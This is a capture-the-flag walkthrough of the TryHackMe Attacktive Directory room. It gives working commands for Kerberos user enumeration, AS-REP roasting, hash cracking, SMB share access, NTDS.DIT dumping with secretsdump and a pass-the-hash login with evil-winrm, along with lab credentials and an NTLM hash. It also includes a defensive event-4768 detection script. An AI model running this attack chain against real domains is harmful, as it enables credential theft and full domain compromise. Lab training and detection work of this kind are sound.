I am writing this to assist anyone looking to get through the Attacktive Directory room on TryHackMe. I hope it helps you further your knowledge on your Active Directory journey.
Prerequisites
- Access to the Internet and a TryHackMe account
- Access to a Kali Linux machine
- Access the room found here:
Task 1: Intro - Deploy The Machine
This part requires you to connect to the machine, which can be done by using OpenVPN with the details provided. In case you have any challenges, you can consider going through the following room:
Alternatively, you can also use the In-Browser Kali or the AttackBox.
Task 2: Intro - Setup
- This section requires you to install the following tools, which you'll be using throughout the room:
- impacket
- bloodhound
- neo4j
- Keep track of these tools and the directories they are stored in, as we'll be making heavy use of them later 😁
- You can follow the instructions in the room and you should be able to install the tools easily.
Task 3: Enumeration - Welcome to Attacktive Directory
- This task now brings your enumeration skills into play. We can begin with a simple nmap scan to discover open ports on the target machine.
- To understand nmap, you can use the following room:
What tool will allow us to enumerate port 139/445?
- This required a bit of research to discover the answer, but the tool matching the required number of characters is:
enum4linux
- We can get the answer to the remaining questions by reading through the nmap scan.
What is the NetBIOS-Domain Name of the machine?
What invalid TLD do people commonly use for their Active Directory Domain?
- The answer to the last question can also be found through research.
Task 4: Enumeration - Enumerating Users via Kerberos
Kerberos is an authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner. This is similar to using OAuth when signing up for services.
- We begin this task by downloading kerbrute from its GitHub repository, as provided in the room. Depending on where you're running it from, you can choose the correct download link. I opted to use:
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_386
- A modified user list and password list are also provided and should be downloaded as well.
- We can then launch it using:
./kerbrute_linux_386
- We get the following banner and a list of options, which you should go through.
What command within Kerbrute will allow us to enumerate valid usernames?
- The answer to the first question is provided in the Available Commands section that kerbrute prints when launched.
What notable account is discovered? (These should jump out at you)
What is the other notable account that is discovered? (These should jump out at you)
- We then execute the userenum command as follows using the appropriate flags:
./kerbrute_linux_386 userenum --dc 10.10.230.203 -d spookysec.local userlist.txt -t 1000
- --dc: points to the IP of the domain controller
- -d: specifies the Active Directory domain name
- userlist.txt is the provided userlist for enumeration
- -t: specifies how many threads we would like to use. You can choose any other number
- We should then get the following list of usernames, some of which stand out and should help us answer the remaining questions in this section.
Task 5: Exploitation - Abusing Kerberos
Further details about AS-REP Roasting, which is referenced in this task, can be found at
- We can begin by navigating to the storage location for the GetNPUsers.py tool by issuing the following command:
cd /opt/impacket/examples/
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
- The answer to this question required a bit of trial and error; the account that was vulnerable to AS-REP Roasting was
svc-admin
- We can confirm this by running the following command, which returns the AS-REP hash for the svc-admin account:
python3 GetNPUsers.py -dc-ip 10.10.11.14 spookysec.local/svc-admin -no-pass
- -dc-ip: provides the IP address or hostname of the domain controller
- spookysec.local/svc-admin is the domain and user we would like to run the script against
- -no-pass: tells the script not to prompt for a password; the request succeeds here because the account does not require Kerberos pre-authentication
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
- We can then look at the wiki page and search using the first few characters of the hash we received.
- We can search using the string $krb5asrep
- From here we can clearly see the answer to the question
What mode is the hash?
- The answer to this question can also be found on the Wiki page above.
Now crack the hash with the modified password list provided, what is the user accounts password?
- For this section, you can use whichever of your favorite password cracking tools you want. I will be using John the Ripper.
- Copy the hash as it was and paste it into a file with any arbitrary name. I used svc_admin_hash.txt
- We then run John the Ripper to crack the hash and view the final password using the following commands:
john --wordlist=passwordlist.txt svc_admin_hash.txt
john --show svc_admin_hash.txt
- We then get the password, which we can use to answer the last question.
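From the defender's side, both techniques in Tasks 4 and 5 leave traces in Windows Security event 4768 (Kerberos TGT requested) on the domain controller: unknown-user failures (Result Code 0x6) from kerbrute's userenum, and a TGT issued with Pre-Authentication Type 0 and RC4 encryption (0x17) for an AS-REP roastable account. The detection logic below is an added example, not part of the room or the original post; the event records are constructed, the field names follow the 4768 EventData schema, and the client IP addresses are made up.

```python
# Added example: detect Kerberos username enumeration and AS-REP roasting
# from CONSTRUCTED Windows Security event 4768 records (field names follow the
# 4768 EventData schema; account names, IPs and counts are made up for the demo).
from collections import Counter

EVENTS = [
    # Username enumeration: "client not found" failures from one source
    {"EventID": 4768, "TargetUserName": "notauser1", "IpAddress": "::ffff:10.50.96.10", "Status": "0x6"},
    {"EventID": 4768, "TargetUserName": "notauser2", "IpAddress": "::ffff:10.50.96.10", "Status": "0x6"},
    {"EventID": 4768, "TargetUserName": "notauser3", "IpAddress": "::ffff:10.50.96.10", "Status": "0x6"},
    # AS-REP roasting: TGT issued with no pre-authentication (PreAuthType 0), RC4 (0x17)
    {"EventID": 4768, "TargetUserName": "svc-admin", "IpAddress": "::ffff:10.50.96.10",
     "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    # Benign: pre-authenticated request (PreAuthType 2 = PA-ENC-TIMESTAMP), AES256 ticket
    {"EventID": 4768, "TargetUserName": "jdoe", "IpAddress": "::ffff:10.50.20.5",
     "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
]

ENUM_THRESHOLD = 3  # unknown-user failures from one client before alerting


def detect_asrep_roast(events):
    """Accounts that received a TGT without pre-auth, encrypted with RC4-HMAC."""
    return [e["TargetUserName"] for e in events
            if e.get("EventID") == 4768 and e.get("Status") == "0x0"
            and e.get("PreAuthType") == "0" and e.get("TicketEncryptionType") == "0x17"]


def detect_user_enum(events, threshold=ENUM_THRESHOLD):
    """Client IPs with at least `threshold` KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) failures."""
    fails = Counter(e["IpAddress"] for e in events
                    if e.get("EventID") == 4768 and e.get("Status") == "0x6")
    return {ip: n for ip, n in fails.items() if n >= threshold}


if __name__ == "__main__":
    print("AS-REP roastable accounts requested:", detect_asrep_roast(EVENTS))
    print("Possible Kerberos username enumeration:", detect_user_enum(EVENTS))
```

Accounts that show up in the first list should have "Do not require Kerberos preauthentication" cleared, or at least hold a long random password and AES-only keys; the second list is a source to pivot on in the rest of your logs.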
Task 6: Enumeration - Back to the Basics
- This task now shows us how to enumerate the SMB shares on the server that the user we compromised can access.
What utility can we use to map remote SMB shares?
- We can use the hint for this question to get the answer.
- The following article might also come in very handy as a quick reference for smbclient. A cheatsheet, if you will.
Which option will list shares?
- The answer to this can be found in the output of the command
man smbclient
How many remote shares is the server listing?
- We can then execute the tool with the username and password we extracted to enumerate the shares. This can be done with the command:
smbclient -L 10.10.11.14 -U svc-admin%management2005
- -U: provides the username
- %: separates the username from the password when we wish to provide the password on the command line
- This should result in the following output.
There is one particular share that we have access to that contains a text file. Which share is it?
- To access a share with smbclient, we can then use:
smbclient \\\\10.10.11.14\\ADMIN$ -U svc-admin%management2005
- We can use the help command to get a list of the smbclient commands available once we access a share.
- As per the specifications of the question, we find only one share with a .txt file.
What is the content of the file?
- We can then download this file using the get command, which saves it to the current directory on our local machine:
get backup_credentials.txt
- We then cat the file to see the credentials:
cat backup_credentials.txt
Decoding the contents of the file, what is the full contents?
- We can identify this as most likely being base64 encoded, which we can decode using the base64 command-line tool as follows:
cat backup_credentials.txt | base64 -d
Task 7: Domain Privilege Escalation - Elevating Privileges within the Domain
- At this point, it's clear that the credentials we recovered from the share accessed as svc-admin are the login credentials for the backup account, so we can attempt privilege escalation and see what else we can find.
- We begin by going back to the storage location for secretsdump.py by using:
cd /opt/impacket/examples/
What method allowed us to dump NTDS.DIT?
- We execute secretsdump.py without arguments, which prints its usage and options:
python3 secretsdump.py
- Scrolling down to the display options section, we see the -just-dc flag, which dumps only the NTDS.DIT data.
- We execute the script once more using this flag, with the following command:
python3 secretsdump.py -just-dc backup:backup2517860@10.10.11.14
- At the very beginning of the output, we can see the method used.
What is the Administrators NTLM hash?
- The answer to this can be found in the output of the previous command, as it is the first hash provided.
What method of attack could allow us to authenticate as the user without the password?
- This question required a bit of research, but the following article clearly explains the method:
Using a tool called Evil-WinRM what option will allow us to use a hash?
- We then do some research on how to install Evil-WinRM; the answer can be found on this GitHub repository page:
- On the same page, we can see the options for Evil-WinRM, including the one that lets us authenticate using only a hash.
Task 8: Flag Submission - Flag Submission Panel
- This task requires us to use Evil-WinRM to log in to the machine using the hash we obtained. This can be done with the command:
evil-winrm -u ADMINISTRATOR -H 0e0363213e37b94221497260b0bcb4fc -i 10.10.11.14
- -u: the username we would like to authenticate as
- -H: the hash we would like to use, as obtained in the previous task
- -i: the IP address of the machine we would like to log in to
- This should result in the following successful login shell, from which we can use Windows commands to navigate and extract the final flags.
svc-admin
- We find the flag in the directory: C:\Users\svc-admin\Desktop\user.txt.txt
backup
- We find the flag in the directory: C:\Users\backup\Desktop\PrivEsc.txt
Administrator
- We find the flag in the directory: C:\Users\Administrator\Desktop\root.txt
Conclusion
- This was quite a fun room, and I got to learn a number of tools that can be used during an attack on AD. I'll be exploring further rooms of a similar nature to augment my knowledge of AD.
- Congratulations to you as well for completing the room, and I challenge you to join me on my AD journey.